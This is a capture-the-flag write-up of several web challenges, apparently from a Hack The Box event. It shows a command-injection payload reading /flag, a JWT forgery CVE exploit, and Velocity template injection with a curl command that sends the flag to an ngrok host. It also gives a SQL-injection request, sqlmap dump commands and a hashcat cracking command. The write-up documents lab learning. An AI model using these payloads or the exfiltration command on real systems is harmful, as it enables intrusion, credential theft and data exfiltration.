web
Flag Command
Solved by: Legend
Challenge description:
Embark on the "Dimensional Escape Quest" where you wake up in a mysterious forest maze that's not quite of this world. Navigate singing squirrels, mischievous nymphs, and grumpy wizards in a whimsical labyrinth that may lead to otherworldly surprises. Will you conquer the enchanted maze or find yourself lost in a different dimension of magical challenges? The journey unfolds in this mystical escape!
In this challenge the website is a game. After interacting with for a few minutes saw that it is running with API
mostly.
In burp I saw there was options which showed all the game command which can be used.
In that there was a secret
command which seemed interesting. Just gave that command as input and got the flag.
TimeKORP
Solved By : thewhiteh4t
- TimeModel.php is vulnerable
<?php
class TimeModel
{
public function __construct($format)
{
$this->command = "date '+" . $format . "' 2>&1";
}
public function getTime()
{
$time = exec($this->command);
$res = isset($time) ? $time : '?';
return $res;
}
}
- specifically :
$this->command = "date '+" . $format . "' 2>&1";
- we just need to match single quotes and insert cat command in between so payload becomes :
';cat /flag;'
LockTalk
Solved by : thewhiteh4t & Starry-lord
This challenge came with files and a docker instance.
We can see the haproxy configuration is set to deny access to the /api/v1/get_ticket endpoint, and that the requirements for this webpage to work is an outdated python_jwt 3.3.3 library.
When we visit the webpage, we are greeted with 3 possible endpoints making everything pretty clear for our next step. but we can’t get a token when we try it because of haproxy. But when we send the request to BurpSuite’s repeater tab, and modify the path, we can actually get a ticket.
With our ticket we can now try the other 2 endpoints and read some exchanges between a fake ransomware group named Openbit3.0
and some of their victims, as a reference to the recent Operation of the Cronos Taskforce related to the LockBit ransomware gang.
So it was time to look into that old python json web token library, and sure enough, there was an exploit to be found. This CVE from 2022 allows to send and claims we want by exploiting the way the json web token is parsed.
python-jwt is a module for generating and verifying JSON Web Tokens. Versions prior to 3.3.4 are subject to Authentication Bypass by Spoofing, resulting in identity spoofing, session hijacking or authentication bypass. An attacker who obtains a JWT can arbitrarily forge its contents without knowing the secret key. Depending on the application, this may for example enable the attacker to spoof other user’s identities, hijack their sessions, or bypass authentication. Users should upgrade to version 3.3.4. There are no known workarounds. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39227
What a nice thing to read as a pentester, “there are no known workarounds”.
https://github.com/user0x1337/CVE-2022-39227
With the help of the given files we can determine that administrator
is the required role to bypass all restrictions on the page.
With this knowledge in hand, we can now use the github proof of concept, as shown below.
With the valid token we retrieved, and the correct role name, we can now craft a payload and send it to the /api/v1/flag endpoint.
HTB{h4Pr0Xy_n3v3r_D1s@pp01n4s}
Labyrinth Linguist
Solved by : thewhiteh4t
- In this challenge we have a translation service
- Upon inspecting source files, we noticed few things :
- flag file is partially randomized in
entrypoint.sh
- flag file is partially randomized in
mv /flag.txt /flag$(cat /dev/urandom | tr -cd "a-f0-9" | head -c 10).txt
- In
pom.xml
we can see the dependencies and their version information :
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>1.5.10.RELEASE</version>
</parent>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.apache.velocity</groupId>
<artifactId>velocity</artifactId>
<version>1.7</version>
</dependency>
<dependency>
<groupId>org.apache.velocity</groupId>
<artifactId>velocity</artifactId>
<version>1.7</version>
</dependency>
</dependencies>
- Velocity v1.7 is vulnerable to SSTI attack
- References :
https://antgarsil.github.io/posts/velocity/ https://iwconnect.com/apache-velocity-server-side-template-injection/
- Based on the PoC above we ran the test case
#set ($run=1 + 1) $run
- RCE was blind because we had no output of the commands so we used
ngrok
for getting a callback to confirm if the payload was working - Then we tried reverse shells but none of them worked for some reason so we thought to simplify we can make it download a file
- And since the command output was not visible we used web requests to exfiltrate the flag by setting custom user agent in curl command
> cat pwn
curl "https://f084-116-74-26-67.ngrok-free.app/special" -H "User-Agent: $(cat /flag*)"
- After sending the file we send a second request to run it using :
sh pwn
- Web logs in ngrok dashboard :
KORP Terminal
Solved by : Legend, thewhiteh4t
- Challenge presents us with a login page
- Testing SQL injection shows that it is vulnerable
- POST request from burpsuite :
POST / HTTP/1.1
Host: 94.237.58.148:47562
Content-Length: 66
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.58.148:47562
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.58.148:47562
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
username=a&password=a
- SQLMap
> sqlmap -r post.txt --ignore-code 401
> sqlmap -r $PWD/post.txt --ignore-code 401 -T users -dump
- This hash is crackable with hashcat
> hashcat -a 0 -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.:password123